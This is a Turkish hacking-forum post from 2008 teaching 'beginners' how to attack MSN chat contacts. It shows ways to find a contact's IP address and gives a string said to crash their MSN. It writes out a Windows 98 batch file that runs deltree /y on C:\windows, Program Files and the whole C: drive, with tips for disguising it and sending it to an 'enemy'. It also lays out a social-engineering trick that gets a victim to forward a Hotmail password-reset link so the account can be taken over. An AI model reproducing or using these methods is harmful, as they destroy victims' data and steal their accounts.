Hack , Hacker, msn Hack , mail hack , web hack , hack sitesi Hack On The Beach :)

Hack , Hacker, msn Hack , mail hack , web hack , hack sitesi Hack On The Beach :)

AnasayfaKapıKayıt OlGiriş yap

Paylaş | 

yeni başlayanlar için basitten msn hack

Önceki başlık Sonraki başlık Aşağa gitmek 
YazarMesaj
devil_in-hell
Admin site sayhibi
Admin site sayhibi

Erkek Mesaj Sayısı : 91
İş/Hobiler : web master
Lakap : By_romantik

MesajKonu: yeni başlayanlar için basitten msn hack   Paz Haz. 01, 2008 2:47 pm

arkadaşlar önce size IP den bahsetmek istiyorum IP dediğimiz olay bilgisayarımızın kimliğidir yani onu sanal alemde belli eden parmak izidir.birinin kimliğini yani IP sini öğrenmek hack için gerekli ben önce size IP öğrenme tekniğini anlatacağım ardından forumu gezip essential net tools isimli programla lamerlik yapabilirsiniz bu programla karşı pc nin paylaşılan dosyalarına müdahale edebilir yani onu elinizde tutabilirsiniz ama önce temel olarak IP gerekli.bu anlattıklarım bence hack in temelini oluşturan parçalardan biri.
arkadaşlar msn den IP bulmanın çeşitli yöntemleri vardır
1- Site IP Adresi
2- Kişisel IP Adresi

Site IP Adresi

Çeşitli programlarla da yapabilirsiniz fakat en kolay yolu;

Başlat > Çalıştır’a gelip CMD yazın.Şimdi ise ping yazdığınızda un IP adresi karşınıza gelir..

Kişisel IP Adresi

1-MS-DOS
2-Mail Yoluyla
3-NetMeeting
4-Outlook Exp.
5-Sniffer’lar

Tek tek açıklamaya başlayalım..

1-MS-DOS

MSN’den Kişisel IP almanın tek yolu vardır o da MS-DOS.Aslında basit bir iş bunu yapmak.Amaa herzaman olacak diye bir şey sözkonusu değil yani bazen hedef şaşabilir Şimdi diyelim ki MSN’de biri ile sohbet ediyorsunuz.Arada bir konu açın ve bir dosya yollayın.Ne olduğu farketmez resim de olur, müzikte, dosya da...Karşıdaki yolladığınız dosyayı kabul ettiğinde dosya inerken siz;

Başlat > Çalıştır’ı açın.CMD yazıp enter’layın.Açılan pencereye netstat –n yazıp tekrar enter’a basın.Şimdi karşınıza birkaç IP çıkacak Şimdi ordaki IP’lerden 2 hane ile başlayan IP lere bakın eğer yanında ESTABLISHED yazıyor ise IP adresi bulduk.Amaa IP’ler birden fazla çıkabilir.Bunun nedeni ise MSN’de başkaları ile yazışmakta olmanızdır..

2-MAIL YOLUYLA

Bu yöntem sadece size gelen mailler doğrultusunda kullanılabilir.Tek tek açıklamak zorundayım..

Hotmail Üzerinden

Hotmail hesabınızı açın.Sonra Options > Additional Options > Mail Display Settings > Message Headers kısmına gelin.”Full”ü işaretleyin ve OK’e tıklayın.Şimdi Inbox’a geçin.Gelen Mail’e tıklayın.Mail açıldığında msjların üstünde IP adresini göreceksiniz..

Yahoo Üzerinden

Yahoo hesabınızı açın.Inbox’a girin.Sonra da IP sini almak istediğiniz kişinin mailini açın.Şimdi sağ üst köşede Full Headers yazısı olacak.Ona tıklayınca maili yazan kişinin IP adresini öğrenebilirsiniz..

Pop3 Üzerinden

Gelen maili farklı kaydedin.Şimdi kaydetmiş olduğunuz mail’in uzantısı .eml dir.Bunu .htm yapın ve dosyayı açın.Mail’in üzerinde IP adresi yazılı olması gerekir..

3-NETMEETING

Yine bir MSN yöntemi daha..MSN de IP sini almak istediğiniz kişiye NetMeeting uygulamasını kabul ettirirseniz karşınıza şöyle bir yazı çıkar..

84.000.000.00 numaralı kişiden yanıt bekleniyor..

Burada 84.000.000.00 numara’sı IP adresi oluyor yani..

4-OUTLOOK EXPRESS

İki yöntemi var aslında.

1-Gelen Mail’i tutum masaüstüne sürükleyin.Şimdi .eml uzantılı dosyanızın uzantısını .htm yapın.Dosyayı açın ve üstte yazılı olan IP adreslerini görün..

2-Outlook ta gelen mail üzerine sağ tıklayın ve Options’a girin.Burada birkaç bilgi olur.IP Adresi de bu bilgiler arasınra olabilir..

5-SNIFFER’LAR

Öncelikle Sniffer’ın program olduğunu bilelim.Bu yöntem ile sizinle iletişimde olan herkesin IP Adresini öğrenebilirsiniz.En kücük paylaşımı bile...Örneğin Kazaa’dan bir dosya çekmektesiniz.Sniffer’ınız IP adresini görüntülüyor.Aynı şekilde MSN’deki kişilerinde IP adresini öğrenebilirsiniz..
verdiğim link için netstat isimli bir program var bu program Ip bulmanıza yardımcı olacaktır.
bu arada size bir tüyo vereyim bunu çoğu insan yemez artık ama ben bulurum diyorsanız buyrun vereceğim kodu kopyala yapıştır yapın ve konuştuğunuz kişiye bi yalan uydurup bunu kişisel iletisine yazmasını sağlayın ardından bu kişinin msn i kapanacak ve sabit disk c deki msn klasoründeki dosyaları silmedikce(bu dosyalara ulaşmak kolay değil)msn çalışmayacaktır işte bu da kod
ñ¯a_Á¯aÿ±m¯aÁÇáç±Çáß±Çá§ÁaÇáDZOÇᯱÇ᧱Çár×ÁÇá+ÑÇ á£áÇá
buda ikinci kod isterseniz ilk verdiğimi yutturun isterseniz bunu
Darwinin teori gerçek, Bush apes
ikiside msn i bozar.
şimdi gelelim biraz daha ciddi işe
diyelimki msn de konuştuğunuz birine çok zarar vermek istiyorsunuz o zaman eğer onun işletim sistemi 98 ise yöntemimiz şu:
1.Notepad 'i açın.
2.Notepad in içine şunları yazın:
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .::Seni salak formatı yedin::.
@echo off
3.Notepad i kapatıp belgeyi kaydedin.
4.Uzantısını .txt den .bat a çevirin.
5.Hazır.
Açıklama:
.
Yaptıktan sonra dosyaya sakın tıklamayın.
Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmıyor.
Not:%100 ÇALIŞIYO
Windows un önemli bi kaç dosyasını siliyor ve sonra "seni salak formatı yedin yazıyor".SENİ SALAK FORMATI YEDİN BOLUMUNE NE İSTERSENİZ YAZABİLRİSNZ.
Peki bunu düşmanıma nasıl yediririm derseniz:
dosyanın adını değiştirin....
maalesef bu xp de tutmuyor size tavsiyem pad dosyayı zip e atıp yollamanız.
şimdi başka bir yöntemle şifre alma:
bunun için karşınızdaki pc den iyi anlamamalı yani uyanık olmamalı yine söylüyorum bir lamer sabırlı olmalıdır buyrun bunu da deneyin:
o kadar mail yontemi var ama eger siz bu işe yeni baslıyorsanız bu yontem sifre alıp korumada en azından sizi geliştirecektir..oncelikle kendimize her zaman ki gibi bir kurban seçiyoruz ki işin en zor tarafı bu..artık düsünün ne kadar kolay bi yontem oldugunu ..kurbanın adı MEHMET simdi diyoruz ki ona '' ya Mehmet benim bir maile bakmam gerek ama mail kutumu açamıyorum sorun var..sana bir mail yolluyorum simdi onu bana kopyala tamam mı? sonra yapacagınız işler sunlardan ibaret
1- hotmail.com açıp oturum açma bolumunun altında ki parolamı unuttumu tıklıyorsunuz ordan mehmet adında ki kurbanın adresini giriyorsunuz
2- sonra o kişinin gizli sorusu ve kendine sıfırlama maili diye iki seçenek çıkacak karsınıza..gizli soruyu bosverip sıfırlama mailine giriyorsunuz ve o kişiye O KİŞİNİN sıfırlama mailini gondermiş oluyorsunuz ( alternatif adresine degil tabi unutmayın! )
3- sonra mehmet abiden gelen maili açıp orda ki adreslerden birini size kopyalamasını istiyorsunuz ( olmadı uzun yoldan maili size forward etmesini istersiniz )
ve işte bu kadar iş bitti..o adrese tıklayıp mehmet abinin adresini yazıyorsunuz ve yeni sifreyi giriyorsunuz
bol şans ve zevkli oluyor tavsiye ederim...
arkadaşlar yazdıklarım bir çeşit derlemedir.yeni başlayan arkadaşlara yardımcı olabildimse ne mutlu bana.bu arada başarılı konu açan kişilerin adminler yada moderatörlerce desteklenmesi daha başarılı işler yapması için konuyu açan üyeyi perçinleyeceğinden ödüller ve yorumlar esirgenmemelidir!!!!!!

BAŞLANGICI OLAN HER ŞEYİN BİRDE SONU VARDIR...
Kullanıcı profilini gör http://turk.0forum.biz

yeni başlayanlar için basitten msn hack
Önceki başlık Sonraki başlık Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» ÇEKEREK TANIYALIM
» 1000 Kitap Özeti Yeni Link! Tek Tek! Tamamını İndirmenize Gerek Yok!
» MSN ŞİFRESİ KIRMANIN FARKLI BİRÇOK YOLU!!!
» 83 LVL Yeni Skiller Bıçak Atma,Felankor Çıkarma,Tüm Party All Stat 15 vs.
» Dıgımon Yeni